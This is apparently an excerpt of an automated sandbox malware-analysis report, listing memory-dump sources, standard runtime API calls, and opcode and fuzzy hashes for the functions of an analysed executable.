                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$HandleModule
                                              • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                              • API String ID: 667068680-1247241052
                                              • Opcode ID: 7e5e4b61806bd80fe30acf3f77fd5b78ca43523249f0ae0a717e655ece5c0550
                                              • Instruction ID: 3b1bab7c98a67544e8bff1b5af8949462abc298f646a6cd546ddf2d2f28a8f2a
                                              • Opcode Fuzzy Hash: 7e5e4b61806bd80fe30acf3f77fd5b78ca43523249f0ae0a717e655ece5c0550
                                              • Instruction Fuzzy Hash: A1E0EC79641320EB8B315FB2BC0D8873AA4EB0D615341DC6BF5C1D610DD67E85018B69
                                              APIs
                                              • type_info::operator==.LIBVCRUNTIME ref: 00FFD4A7
                                              • ___TypeMatch.LIBVCRUNTIME ref: 00FFD5B5
                                              • _UnwindNestedFrames.LIBCMT ref: 00FFD707
                                              • CallUnexpected.LIBVCRUNTIME ref: 00FFD722
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 2751267872-393685449
                                              • Opcode ID: 74fb29ce00354871b7cd432f53e3bd53ded5c5735159feb4445de1b3eea5b62c
                                              • Instruction ID: fc80276bb281760ddad6e1b8407379e5dce24ceca87f0711b16e737ac066dc93
                                              • Opcode Fuzzy Hash: 74fb29ce00354871b7cd432f53e3bd53ded5c5735159feb4445de1b3eea5b62c
                                              • Instruction Fuzzy Hash: 64B16871C0020DEFCF15EFA4C9819BEB7B6AF04320F14405AEA15AB226D735EA51EF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3907804496
                                              • Opcode ID: 00f0e95c3ea00d88d331da633d36f4cae0fd9f36bb684cde355c865a609f4e12
                                              • Instruction ID: 62c5a39f83093aaf7e2c84baf1f628b8e8fc3e6e2f5390058fcba3643592e4c5
                                              • Opcode Fuzzy Hash: 00f0e95c3ea00d88d331da633d36f4cae0fd9f36bb684cde355c865a609f4e12
                                              • Instruction Fuzzy Hash: 8AB1C174A0424AAFFB17DF9CC980BAEBBF1AF46304F0442D9E680972D1C7759981CB61
                                              APIs
                                              • GetCPInfo.KERNEL32(0157FE40,0157FE40,?,7FFFFFFF,?,01014A7A,0157FE40,0157FE40,?,0157FE40,?,?,?,?,0157FE40,?), ref: 01014850
                                              • __alloca_probe_16.LIBCMT ref: 0101490B
                                              • __alloca_probe_16.LIBCMT ref: 0101499A
                                              • __freea.LIBCMT ref: 010149E5
                                              • __freea.LIBCMT ref: 010149EB
                                              • __freea.LIBCMT ref: 01014A21
                                              • __freea.LIBCMT ref: 01014A27
                                              • __freea.LIBCMT ref: 01014A37
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16$Info
                                              • String ID:
                                              • API String ID: 127012223-0
                                              • Opcode ID: 3a69a0e83862152f1d98c225163e62e4568ec121b408afefd1b0c7629bc0b609
                                              • Instruction ID: ef873e4cc8ed04d1f2d76d0109add811ab11f6d686b9b33eaa9ca4c554bed087
                                              • Opcode Fuzzy Hash: 3a69a0e83862152f1d98c225163e62e4568ec121b408afefd1b0c7629bc0b609
                                              • Instruction Fuzzy Hash: 7B71263290424A5BEF219F988C41BFE7BEAAF45310F190199EEC4E72A5E77D8800C764
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00FF96AB
                                              • __alloca_probe_16.LIBCMT ref: 00FF96D7
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00FF9716
                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FF9733
                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00FF9772
                                              • __alloca_probe_16.LIBCMT ref: 00FF978F
                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FF97D1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FF97F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                              • String ID:
                                              • API String ID: 2040435927-0
                                              • Opcode ID: 21df004707abe7174977bebe605bd8609b2b13df691abc1396ed086a0c222acf
                                              • Instruction ID: 40e7653c6a08d9055728aef8311064023d0869ed07e7ba9284d7ad0a017d8072
                                              • Opcode Fuzzy Hash: 21df004707abe7174977bebe605bd8609b2b13df691abc1396ed086a0c222acf
                                              • Instruction Fuzzy Hash: 7451D27291420EABEF215F50CC44FBB7BA9EF40790F104425FA05D61A0D7B99C10EB50
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00FF84D8
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FF84E2
                                              • int.LIBCPMT ref: 00FF84F9
                                                • Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
                                                • Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61
                                              • codecvt.LIBCPMT ref: 00FF851C
                                              • std::_Facet_Register.LIBCPMT ref: 00FF8533
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FF8553
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                              • String ID:
                                              • API String ID: 712880209-0
                                              • Opcode ID: 2c22e613be808d18341e11bffbe16943a77127d75a4cbfadc4b10f264e9d42d0
                                              • Instruction ID: 285982a1602c693d5360f41493f238c6583d0dcc8b32b531f20646f88ee48ac6
                                              • Opcode Fuzzy Hash: 2c22e613be808d18341e11bffbe16943a77127d75a4cbfadc4b10f264e9d42d0
                                              • Instruction Fuzzy Hash: 8011B47190061C9BCB14EB68CC017BE77B4BF44734F180909FA45AB2A1EFB8AE01E791
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00FFD011,00FFB5E0,00FF5F94,9B609FF6,?,?,?,?,010163F6,000000FF), ref: 00FFD028
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FFD036
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FFD04F
                                              • SetLastError.KERNEL32(00000000,?,00FFD011,00FFB5E0,00FF5F94,9B609FF6,?,?,?,?,010163F6,000000FF), ref: 00FFD0A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 37d662224dc85c8cbc4d92dcc9dc066841be498835d58c018e11b94d002ba652
                                              • Instruction ID: 12998db98dc64b744d0ef2ed560aa387a72d557de0a8f8602bd1e50a8489c696
                                              • Opcode Fuzzy Hash: 37d662224dc85c8cbc4d92dcc9dc066841be498835d58c018e11b94d002ba652
                                              • Instruction Fuzzy Hash: D601B53250931E5DA7392574AC45A3B3E45EF01779F20032AF750811F8EF5A4C03B648
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00FF71E3
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FF71ED
                                              • int.LIBCPMT ref: 00FF7204
                                                • Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
                                                • Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61
                                              • codecvt.LIBCPMT ref: 00FF7227
                                              • std::_Facet_Register.LIBCPMT ref: 00FF723E
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FF725E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                              • String ID:
                                              • API String ID: 712880209-0
                                              • Opcode ID: 4aee68ceb4b6c09fc957b18fc77d3256d34f2c36882919b93ffcaf49ee013ee4
                                              • Instruction ID: a1038bc6e4953978d66134f000423c9cdb600684755d212a03b20629d77a496c
                                              • Opcode Fuzzy Hash: 4aee68ceb4b6c09fc957b18fc77d3256d34f2c36882919b93ffcaf49ee013ee4
                                              • Instruction Fuzzy Hash: FB01C03190422D8BCB14FBA4DC556BEB7A1BF84720F240408FA00AB2E1DF789E01EB91
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B609FF6,00000000,?,00000000,0101661D,000000FF,?,0100495C,?,?,01004930,?), ref: 01004A01
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01004A13
                                              • FreeLibrary.KERNEL32(00000000,?,00000000,0101661D,000000FF,?,0100495C,?,?,01004930,?), ref: 01004A35
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 6bc159a0eea634607154b77828ddd2caef2f365e599cb9710f7fcb2d7d5d8dea
                                              • Instruction ID: 2ff9617a381a88fa24d5a5d0af963a0962ced921fda71c4625224e9567d06511
                                              • Opcode Fuzzy Hash: 6bc159a0eea634607154b77828ddd2caef2f365e599cb9710f7fcb2d7d5d8dea
                                              • Instruction Fuzzy Hash: 3701A735600655EFEB229F94CC05BAFBFB9FB04711F004529F951E2284DB7D9500CB54
                                              APIs
                                              • __alloca_probe_16.LIBCMT ref: 01009E79
                                              • __alloca_probe_16.LIBCMT ref: 01009F3A
                                              • __freea.LIBCMT ref: 01009FA1
                                                • Part of subcall function 01007F6F: HeapAlloc.KERNEL32(00000000,00FF55FC,?,?,00FFAFBA,?,?,?,00000000,?,00FF2709,00FF55FC,?,?,?,?), ref: 01007FA1
                                              • __freea.LIBCMT ref: 01009FB6
                                              • __freea.LIBCMT ref: 01009FC6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                              • String ID:
                                              • API String ID: 1096550386-0
                                              • Opcode ID: eda7b0f1dde1100209fdc5cfc4ccfe445499b1afb678c966c80144bbc90455fa
                                              • Instruction ID: 35afd2f145bf9628a286a3b262dfe24c9de350d217320563250c936c1e78e8f9
                                              • Opcode Fuzzy Hash: eda7b0f1dde1100209fdc5cfc4ccfe445499b1afb678c966c80144bbc90455fa
                                              • Instruction Fuzzy Hash: F851A37260420A6BFB225F68CC40EBB7AE9EF44358F15416CFE4CD6291EB75DC108760
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00FF6191
                                              • AcquireSRWLockExclusive.KERNEL32(?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF61B0
                                              • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF61DE
                                              • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF6239
                                              • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF6250
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AcquireExclusiveLock$CurrentThread
                                              • String ID:
                                              • API String ID: 66001078-0
                                              • Opcode ID: f7116fb2be88e7f7cb69800b94db048652ad79757dafab4cef407511fec6c08b
                                              • Instruction ID: 0a4abf8f5b22de5b11fdd4c03605ff03903c5cd46c17765e99204b36087ed057
                                              • Opcode Fuzzy Hash: f7116fb2be88e7f7cb69800b94db048652ad79757dafab4cef407511fec6c08b
                                              • Instruction Fuzzy Hash: 6C41563190060ADFCF20CF64C481ABAB7B4FF49364B104A2AE646D7561DB34F984EB90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00FF66CC
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FF66D7
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FF6745
                                                • Part of subcall function 00FF6828: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00FF6840
                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00FF66F2
                                              • _Yarn.LIBCPMT ref: 00FF6708
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                              • String ID:
                                              • API String ID: 1088826258-0
                                              • Opcode ID: 9e0aa047749780028b62ec3f4c31f4836bc5b28e49d191b2a8dc19e2150103cb
                                              • Instruction ID: 033c60f905fb654ac87ffe461b790978b37012dc25f79a36ea734237c4e81e56
                                              • Opcode Fuzzy Hash: 9e0aa047749780028b62ec3f4c31f4836bc5b28e49d191b2a8dc19e2150103cb
                                              • Instruction Fuzzy Hash: F001BCB5A00228DFCB05EB20DC5153D7B61BF85754B044008EA4197396CF7EAA42EBC1
                                              APIs
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00FFE0C3,?,?,00000000,?,?,?,00FFE1ED,00000002,FlsGetValue,010191A8,FlsGetValue), ref: 00FFE11F
                                              • GetLastError.KERNEL32(?,00FFE0C3,?,?,00000000,?,?,?,00FFE1ED,00000002,FlsGetValue,010191A8,FlsGetValue,?,?,00FFD03B), ref: 00FFE129
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00FFE151
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: d794ab02dfd118f1569b9823a9fcb34f78e25653615b7690ab2c20497a4bb9de
                                              • Instruction ID: 18047eda2d5b68458f2b75fde2cbc08a9d881113b06b8dd7f99b7cd660a96198
                                              • Opcode Fuzzy Hash: d794ab02dfd118f1569b9823a9fcb34f78e25653615b7690ab2c20497a4bb9de
                                              • Instruction Fuzzy Hash: 52E04834680309F7EF211E61DC05F683B55AF00F54F204420FA4DA81F4DB7A9950A685
                                              APIs
                                              • GetConsoleOutputCP.KERNEL32(9B609FF6,00000000,00000000,?), ref: 0100A41E
                                                • Part of subcall function 0100CF52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01009F97,?,00000000,-00000008), ref: 0100CFFE
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0100A679
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0100A6C1
                                              • GetLastError.KERNEL32 ref: 0100A764
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                              • String ID:
                                              • API String ID: 2112829910-0
                                              • Opcode ID: c8c3247f528ce92d070d462b5a1eff09489adfc66d3afadd557729d51adbf374
                                              • Instruction ID: 1cca1b2c70e9a2409b79c238fd3861c47b71409f82b87f70dd056914df4e10ab
                                              • Opcode Fuzzy Hash: c8c3247f528ce92d070d462b5a1eff09489adfc66d3afadd557729d51adbf374
                                              • Instruction Fuzzy Hash: 76D15C75E00248DFEB16CFA8D880AEDBBF4FF48314F18856AE596E7291D734A941CB50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustPointer
                                              • String ID:
                                              • API String ID: 1740715915-0
                                              • Opcode ID: ab23eaf61a7254c491e497765016a258b10d6e6170c38f51fd8f1c84bda35588
                                              • Instruction ID: 13843aab11aec76675bf92c8f3710f8b95ea62f58233c27a32d13b576c5cd1bb
                                              • Opcode Fuzzy Hash: ab23eaf61a7254c491e497765016a258b10d6e6170c38f51fd8f1c84bda35588
                                              • Instruction Fuzzy Hash: 9F51E2B2A0430EAFEB299F54D881B7A77A6EF44720F14442DEA15472B1E735ED40FB90
                                              APIs
                                                • Part of subcall function 0100CF52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01009F97,?,00000000,-00000008), ref: 0100CFFE
                                              • GetLastError.KERNEL32 ref: 0100D3D2
                                              • __dosmaperr.LIBCMT ref: 0100D3D9
                                              • GetLastError.KERNEL32(?,?,?,?), ref: 0100D413
                                              • __dosmaperr.LIBCMT ref: 0100D41A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 1913693674-0
                                              • Opcode ID: caa5750dbc19cd8529c44b58477d0053a9800d1681501a892f414a1967686cba
                                              • Instruction ID: cc2fe9768cdcfd811562c0243439e2465085892210bcaf6708378357240b4fa7
                                              • Opcode Fuzzy Hash: caa5750dbc19cd8529c44b58477d0053a9800d1681501a892f414a1967686cba
                                              • Instruction Fuzzy Hash: F621B331600206AFBB239FE988809ABB7E9FF45364F448559F999971C0DB31ED408BA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
